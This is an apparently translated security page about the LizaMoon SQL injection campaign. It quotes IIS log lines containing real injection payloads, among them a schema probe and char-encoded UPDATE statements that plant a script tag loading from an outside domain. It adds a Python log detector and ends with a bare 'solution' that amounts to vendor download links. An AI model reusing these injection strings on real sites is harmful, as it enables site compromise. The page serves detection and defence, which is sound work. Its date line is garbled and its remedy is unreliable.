Lizamoon.com Trojan Solution

Source: Internet
Author: User

Websense, a foreign security vendor, recently issued an alert saying that a SQL injection attack called Lisa Moon (English name: lizamoon) is sweeping the world. In just a few days, the number of attacked web pages has rapidly increased to 1030000 (as of on January 10, April 2). Foreign media described it as "a tsunami outbreak", and even websites of well-known companies such as Apple are listed. At the same time, the number of Chinese web pages affected by Lisa Moon has reached 46800.

  • Several suspicious IP addresses: 95.64.9.18 (from Romania), 91.217.162.45 (from Ukraine, a notorious malicious network)
  • Valuable IIS log entries provided by netizens (a very important clue for identifying the intrusion):

    16:34:45 w3svc1746246233 *myserverip* GET /DIR/linkdetail.aspx id=11011+or+1=(Select+TOP+1+table_name+from+information_schema.tables+Where+table_name+not+in+(select+TOP+0+table_name+from+information_schema.tables)-- 80 - 91.217.162.45 Mozilla/5.0+(windows;+U;+windows+nt+5.0;+en-US;+RV:1.4)+Gecko/20030624+Netscape/7.1+(ax) 500 0 0

    Doc.asp?Id=pu000031+Update+gcategoriashistoricotiposdescripciones+set+descripcion=Replace(cast(descripcion+As+varchar(8000),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)... [omitted: the char(NN) values are concatenated to spell out the string </title><SCRIPT src=httq://lazemoon.COM/UR.php></SCRIPT>] ...%2Bchar(116)%2Bchar(62)+As+varchar(8000),cast(char(32)+As+varchar(8)))-- 95.64.9.18 Mozilla/5.0+(windows;+U;+windows+nt+5.0;+en-US;+RV:1.4)+Gecko/20030624+Netscape/7.1+(ax)-302 498

    17:56:49 <my server IP address> GET /<pagename>.asp prod=mg0011'+Update+tblmembers+set+forename=Replace(cast(forename+As+varchar(8000)),Cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)... [omitted: the char(NN) values are concatenated to spell out the string </title><SCRIPT src=httq://lazemoon.COM/UR.php></SCRIPT>] ...%2Bchar(116)%2Bchar(62)+As+varchar(8000),cast(char(32)+As+varchar(8)-- 80 - 95.64.9.18 HTTP/1.1 Mozilla/5.0+(windows;+U;+windows+nt+5.0;+en-US;+RV:1.4)+Gecko/20030624+Netscape/7.1+(ax)
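
The two request shapes in the log entries above (the information_schema probe and the Update ... Replace(cast( rewrite carrying a char(NN) run) can be searched for in your own IIS logs. The following is an added example, not part of the original page: the field order, the sample log lines, the 192.0.2.x/203.0.113.x/198.51.100.x addresses and the example.invalid marker URL are all constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Assumed field order (constructed): time site s-ip method uri-stem uri-query
# port username c-ip user-agent status substatus win32-status
PROBE = re.compile(r"select\s+top\s+\d+\s+table_name\s+from\s+information_schema\.tables", re.I)
REWRITE = re.compile(r"update\s+\w+\s+set\s+\w+\s*=\s*replace\s*\(\s*cast\s*\(", re.I)
CHAR_RUN = re.compile(r"\bchar\(\d+\)(?:\+char\(\d+\))+", re.I)

def decode_char_runs(sql):
    """Replace char(60)+char(47)+... with the literal text it concatenates."""
    return CHAR_RUN.sub(
        lambda m: "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(0))), sql)

def classify(line):
    """Return (client_ip, uri_stem, kind, injected_tag) or None for a clean line."""
    fields = line.split()
    if len(fields) < 9 or line.startswith("#"):
        return None
    stem, query, client = fields[4], fields[5], fields[8]
    sql = unquote_plus(query)          # IIS logs spaces as '+', and '+' as %2B
    if PROBE.search(sql):
        return (client, stem, "schema-probe", "")
    if REWRITE.search(sql):
        tag = re.search(r"<script[^>]*>", decode_char_runs(sql), re.I)
        return (client, stem, "mass-update", tag.group(0) if tag else "")
    return None

def scan(lines):
    """Classify every line and keep only the suspicious ones."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log; the marker URL is a placeholder, not the one in the logs.
MARKER = "</title><script src=http://example.invalid/x.js></script>"
ENCODED = "%2B".join(f"char({ord(c)})" for c in MARKER)
SAMPLE_LOG = [
    "16:34:45 W3SVC1 192.0.2.10 GET /dir/linkdetail.aspx id=11011+or+1=(select+top+1+"
    "table_name+from+information_schema.tables+where+table_name+not+in+(select+top+0+"
    "table_name+from+information_schema.tables))-- 80 - 203.0.113.7 Mozilla/5.0+(ax) 500 0 0",
    "17:56:49 W3SVC1 192.0.2.10 GET /page.asp prod=mg0011'+update+tblmembers+set+forename="
    f"replace(cast(forename+as+varchar(8000)),cast({ENCODED}+as+varchar(8000)),"
    "cast(char(32)+as+varchar(8)))-- 80 - 203.0.113.9 Mozilla/5.0+(ax) 302 0 0",
    "17:57:02 W3SVC1 192.0.2.10 GET /page.asp prod=mg0011 80 - 198.51.100.4 Mozilla/5.0+(ax) 200 0 0",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A "mass-update" hit names the page and parameter that accepted the injected statement, and the decoded tag is the string to search for in the affected database columns.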

 

Solution

1. Download the web anti-virus software (address: http://www.safe3.com.cn/works/884981847/view.aspx) to clear the Trojan data from the affected fields in the database.

2. Download and install the safe3 web application firewall to protect the website (address: http://www.safe3.com.cn/works/271360615/view.aspx).

 

3. Success.
